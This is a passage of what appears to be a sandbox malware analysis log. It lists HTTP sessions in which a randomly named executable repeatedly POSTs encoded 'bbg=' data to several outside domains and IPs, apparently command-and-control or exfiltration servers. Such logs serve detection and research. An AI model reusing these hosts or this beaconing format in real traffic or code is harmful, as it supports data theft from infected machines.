                                                                                      30 | 192.168.2.5 | 50028 | 209.74.77.107 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:53:55.756453037 CET | 795 | OUT | POST /2eo9/ HTTP/1.1
                                                                                      Host: www.beyondfitness.live
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.beyondfitness.live
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.beyondfitness.live/2eo9/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=2VOTbtor59ahCdD7DwRuvr2j7zMUR2tPlruz7qMf8m41YW/bUQpveX06QDhzb8biVsL+r+YALP22K2sCbCS4m378lry6d0owEMpExUl9C6XAz1/x5BBMdEzahYNHtWtPLSCtJFPt83JI1WpSTBpXRqESDq7RQGXQZtr1faBN3tEu4CGeRiwBv25/csCXrchfx8FM4XQ=
                                                                                      Jan 10, 2025 19:53:57.192677975 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Fri, 10 Jan 2025 18:53:56 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      31 | 192.168.2.5 | 50029 | 209.74.77.107 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:53:58.319639921 CET | 815 | OUT | POST /2eo9/ HTTP/1.1
                                                                                      Host: www.beyondfitness.live
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.beyondfitness.live
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.beyondfitness.live/2eo9/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=2VOTbtor59ahEMz7Tnlumr2giTMUaWtLlriz7uVC80M1Y3PbGFJvS306Fzh2VcbXVsWLr8MALPi2KzQCbxq/nn76jryCCkowEMpExXYQC5nAzlPx2ABDXkzViYNH7mtDLSCPJEi481xI1TVSSSxUCKEYbK7GBGOCdefKecwZgOhQ0U30LA4p8WVHM/Kg6sA2rfV8mAH3a2Mg3ntyeGV3rEwWYxtw
                                                                                      Jan 10, 2025 19:53:59.566045046 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Fri, 10 Jan 2025 18:53:59 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      32 | 192.168.2.5 | 50030 | 209.74.77.107 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:54:00.881843090 CET | 1832 | OUT | POST /2eo9/ HTTP/1.1
                                                                                      Host: www.beyondfitness.live
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.beyondfitness.live
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.beyondfitness.live/2eo9/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=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 [TRUNCATED]
                                                                                      Jan 10, 2025 19:54:02.179037094 CET | 533 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Fri, 10 Jan 2025 18:54:01 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      33 | 192.168.2.5 | 50031 | 209.74.77.107 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:54:03.436743975 CET | 529 | OUT | GET /2eo9/?4Hph=tXCXkpKPT&bbg=7XmzYZMr38GxQ9PAC0sOj6+qqhhrckRH6Nq2/pV9l30WNGyrAQ9CTyNBBx9RcOn2QODlxsxyZKKfc2UgMRuej2Phu9qscykKfItb6htlbLHkk3vv6Dp9SyXAhpxA8WVGQQ== HTTP/1.1
                                                                                      Host: www.beyondfitness.live
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:54:04.620337963 CET | 548 | IN | HTTP/1.1 404 Not Found
                                                                                      Date: Fri, 10 Jan 2025 18:54:04 GMT
                                                                                      Server: Apache
                                                                                      Content-Length: 389
                                                                                      Connection: close
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      34 | 192.168.2.5 | 50032 | 147.255.21.187 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:54:10.225976944 CET | 771 | OUT | POST /29r3/ HTTP/1.1
                                                                                      Host: www.50food.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.50food.com
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.50food.com/29r3/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=6EfZ23Ayv35j74Whgw/6jCSIeBA/s2zDOokmkwbegIiGCTd+XTc8WvtoUkxDbNHUkHHCqe+FYUVtSUQ7xluS3aCQmuvcpizxYGma2YmDSUdktK5iw8cWikJfgTRkdeY78c+8GVLe7JQfZ5RGy4zGtyAhNKHjUoJU7Apy07MeNLtX/a5Thln6aiByKpOw6feiN4mPn84=
                                                                                      Jan 10, 2025 19:54:10.812429905 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:54:07 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 166
                                                                                      Connection: close
                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      35 | 192.168.2.5 | 50033 | 147.255.21.187 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:54:12.780946970 CET | 791 | OUT | POST /29r3/ HTTP/1.1
                                                                                      Host: www.50food.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.50food.com
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.50food.com/29r3/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=6EfZ23Ayv35j6bOhmTX6yiSJShA/mWzHOoomky2Dn6WGC3N+WR48Xvtob0xGfNHfkHb8qfCFYUptSUA7xWWN2KCSqOvCnCzxYGma2YylSV1kt6JizddkhkJclTRkMuY/8c/GGXu57LYfZ6FGzpzHiyAdSaGrbNQFijNlrdZoOapZ6sI57HvSJCtKa6GHrv/LXb2/5ruLq7g+Kl4Ofn6ssF38eKtu
                                                                                      Jan 10, 2025 19:54:13.388597012 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:54:09 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 166
                                                                                      Connection: close
                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      36 | 192.168.2.5 | 50034 | 147.255.21.187 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:54:15.331478119 CET | 1808 | OUT | POST /29r3/ HTTP/1.1
                                                                                      Host: www.50food.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.50food.com
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.50food.com/29r3/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg= [TRUNCATED]
                                                                                      Jan 10, 2025 19:54:15.952819109 CET | 309 | IN | HTTP/1.1 403 Forbidden
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:54:12 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 166
                                                                                      Connection: close
                                                                                      Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      37 | 192.168.2.5 | 50035 | 147.255.21.187 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:54:17.877803087 CET | 521 | OUT | GET /29r3/?bbg=3G351C0lqnMT5KSEhB6QkRv7ej9rv2/VXMsOqSS+pJvTAxAcXzEXZLJlfm59V9XHiWzt79CRV1JOIFYnv3Wo76qcp/vE/TTTBmL93e2sLUBUnoZ9o80wo25/oxpiL6JXtg==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.50food.com
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:54:18.487580061 CET | 141 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:54:14 GMT
                                                                                      Content-Type: text/html
                                                                                      Content-Length: 0
                                                                                      Connection: close


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      38 | 192.168.2.5 | 50036 | 185.68.16.160 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:54:23.639585972 CET | 771 | OUT | POST /p9ll/ HTTP/1.1
                                                                                      Host: www.dymar.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.dymar.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.dymar.shop/p9ll/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Ascii: bbg=8pK8r6I6FVLL+fadahVS6yILl5uzGRw58ZyeGZqH0S83KdBRO8ASrFVH5gOJXbBkAMOJpc6lamOsxj+8gEtf/sB3AyWufhrU//nnWYzKBzLUcXBsTuTm2S055L+rf4O47sP2HgNFkCg6LI5GQ1GgtMtGx6kZsIWIodx0NOJSRHO2qBaHCvtmp0rbfHubuiFRin8b3N0=
                                                                                      Jan 10, 2025 19:54:24.475491047 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:54:24 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: OCSESSID=7cc91b54a734037afb07d620d6; path=/
                                                                                      Set-Cookie: language=ru-ru; expires=Sun, 09-Feb-2025 18:54:24 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                      Set-Cookie: currency=UAH; expires=Sun, 09-Feb-2025 18:54:24 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                      x-ray: wnp32698:0.120/wn32698:0.120/wa32698:D=118049
                                                                                      Content-Encoding: gzip


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      39 | 192.168.2.5 | 50037 | 185.68.16.160 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:54:26.190392017 CET | 791 | OUT | POST /p9ll/ HTTP/1.1
                                                                                      Host: www.dymar.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.dymar.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.dymar.shop/p9ll/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 38 70 4b 38 72 36 49 36 46 56 4c 4c 34 37 65 64 5a 43 39 53 38 53 49 49 70 5a 75 7a 66 42 78 77 38 5a 75 65 47 62 62 66 7a 67 59 33 4b 35 46 52 4e 2b 6f 53 6f 46 56 48 32 77 4f 47 4b 4c 42 76 41 4d 53 33 70 65 75 6c 61 69 6d 73 78 69 4f 38 67 33 31 63 38 63 42 69 55 43 57 6f 62 68 72 55 2f 2f 6e 6e 57 59 6d 74 42 33 66 55 66 6c 56 73 53 50 54 6c 37 79 30 6d 77 72 2b 72 62 34 4f 38 37 73 50 45 48 6b 55 65 6b 47 51 36 4c 4d 70 47 51 67 71 76 6a 4d 74 45 2b 61 6c 72 38 34 6e 39 6e 4f 4e 6b 41 38 64 50 4c 6b 32 32 6d 58 72 74 59 4e 6c 4f 36 55 48 6a 50 55 6d 73 2f 53 6b 34 34 45 73 72 70 61 6a 37 79 6f 47 55 6a 62 71 31 44 79 56 62 4b 63 5a 59 36 6c 62 37
                                                                                      Data Ascii: bbg=8pK8r6I6FVLL47edZC9S8SIIpZuzfBxw8ZueGbbfzgY3K5FRN+oSoFVH2wOGKLBvAMS3peulaimsxiO8g31c8cBiUCWobhrU//nnWYmtB3fUflVsSPTl7y0mwr+rb4O87sPEHkUekGQ6LMpGQgqvjMtE+alr84n9nONkA8dPLk22mXrtYNlO6UHjPUms/Sk44Esrpaj7yoGUjbq1DyVbKcZY6lb7
                                                                                      Jan 10, 2025 19:54:27.008007050 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:54:26 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: OCSESSID=53be1d3a674e5327abd56ef2cf; path=/
                                                                                      Set-Cookie: language=ru-ru; expires=Sun, 09-Feb-2025 18:54:26 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                      Set-Cookie: currency=UAH; expires=Sun, 09-Feb-2025 18:54:26 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                      x-ray: wnp32698:0.110/wn32698:0.110/wa32698:D=109573
                                                                                      Content-Encoding: gzip


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      40 | 192.168.2.5 | 50038 | 185.68.16.160 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:54:28.733746052 CET | 1808 | OUT | POST /p9ll/ HTTP/1.1
                                                                                      Host: www.dymar.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.dymar.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 1240
                                                                                      Referer: http://www.dymar.shop/p9ll/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:54:29.535018921 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:54:29 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: OCSESSID=4ccdd6c1675039079c9354df9d; path=/
                                                                                      Set-Cookie: language=ru-ru; expires=Sun, 09-Feb-2025 18:54:29 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                      Set-Cookie: currency=UAH; expires=Sun, 09-Feb-2025 18:54:29 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                      x-ray: wnp32698:0.110/wn32698:0.110/wa32698:D=112835
                                                                                      Content-Encoding: gzip


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      41 | 192.168.2.5 | 50039 | 185.68.16.160 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:54:31.325951099 CET | 521 | OUT | GET /p9ll/?bbg=xricoPUhMXLl8f28VT4xzhY6t4bZSB0G1+CjUa2j1QQaHO4mbNQdsyhC9y7mIsh8JvmYw8eVSH73nhuf0Xl7ku83LF6dLivHkvOUWe3dGgjTeU1FcMTS2wwr3KqFBZ3Pmw==&4Hph=tXCXkpKPT HTTP/1.1
                                                                                      Host: www.dymar.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Connection: close
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Jan 10, 2025 19:54:32.152220964 CET | 1236 | IN | HTTP/1.1 404 Not Found
                                                                                      Server: nginx
                                                                                      Date: Fri, 10 Jan 2025 18:54:32 GMT
                                                                                      Content-Type: text/html; charset=utf-8
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Set-Cookie: OCSESSID=09d5d2ba5f77960f0f6a6c4e21; path=/
                                                                                      Set-Cookie: language=ru-ru; expires=Sun, 09-Feb-2025 18:54:31 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                      Set-Cookie: currency=UAH; expires=Sun, 09-Feb-2025 18:54:31 GMT; Max-Age=2592000; path=/; domain=www.dymar.shop
                                                                                      x-ray: wnp32698:0.120/wn32698:0.120/wa32698:D=118787


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      42 | 192.168.2.5 | 50040 | 194.195.220.41 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:54:37.494205952 CET | 792 | OUT | POST /t846/ HTTP/1.1
                                                                                      Host: www.earbudsstore.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.earbudsstore.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 204
                                                                                      Referer: http://www.earbudsstore.shop/t846/
                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.94 Safari/537.36
                                                                                      Data Raw: 62 62 67 3d 31 64 2f 6a 68 70 42 2b 65 66 4d 70 4c 2f 35 44 49 66 34 63 76 61 7a 55 6a 50 69 7a 6e 4d 30 56 47 61 4a 6a 4a 44 73 53 6a 6c 4e 4f 73 4c 72 43 43 4b 42 74 55 6a 2b 49 69 45 54 32 41 4e 2f 32 72 57 4c 55 38 77 2f 55 39 63 47 5a 4c 41 34 39 2b 49 70 54 49 33 32 6e 42 62 77 7a 31 75 56 37 6d 33 44 4f 51 56 51 49 30 51 7a 63 73 44 79 4b 36 46 70 58 4c 55 78 68 53 51 35 49 68 30 63 6c 57 42 4b 53 71 65 59 34 7a 43 54 70 4f 69 4a 4b 4e 73 50 63 61 70 61 50 79 4d 32 69 74 73 6b 6f 61 72 6f 69 36 46 30 79 42 45 71 49 50 41 47 47 38 6c 71 53 30 38 74 33 53 69 30 46 50 41 44 62 6a 79 6d 4a 6e 70 41 3d
                                                                                      Data Ascii: bbg=1d/jhpB+efMpL/5DIf4cvazUjPiznM0VGaJjJDsSjlNOsLrCCKBtUj+IiET2AN/2rWLU8w/U9cGZLA49+IpTI32nBbwz1uV7m3DOQVQI0QzcsDyK6FpXLUxhSQ5Ih0clWBKSqeY4zCTpOiJKNsPcapaPyM2itskoaroi6F0yBEqIPAGG8lqS08t3Si0FPADbjymJnpA=
                                                                                      Jan 10, 2025 19:54:38.029165983 CET | 877 | IN | HTTP/1.1 200 OK
                                                                                      Server: openresty/1.13.6.1
                                                                                      Date: Fri, 10 Jan 2025 18:54:37 GMT
                                                                                      Content-Type: text/html
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      Content-Encoding: gzip


                                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                      43 | 192.168.2.5 | 50041 | 194.195.220.41 | 80 | 4680 | C:\Program Files (x86)\mWabryfHuuCavSeCcAMyWYDKsSjRFhyetIEsnxYJModQvIrcppfYRfKhyRcUrtWfVkYKpeFmGonTHuo\CkszoACLEZHP.exe
                                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                                      Jan 10, 2025 19:54:40.046895027 CET | 812 | OUT | POST /t846/ HTTP/1.1
                                                                                      Host: www.earbudsstore.shop
                                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                      Accept-Encoding: gzip, deflate
                                                                                      Accept-Language: en-US,en;q=0.5
                                                                                      Origin: http://www.earbudsstore.shop
                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                      Connection: close
                                                                                      Cache-Control: max-age=0
                                                                                      Content-Length: 224
                                                                                      Referer: http://www.earbudsstore.shop/t846/
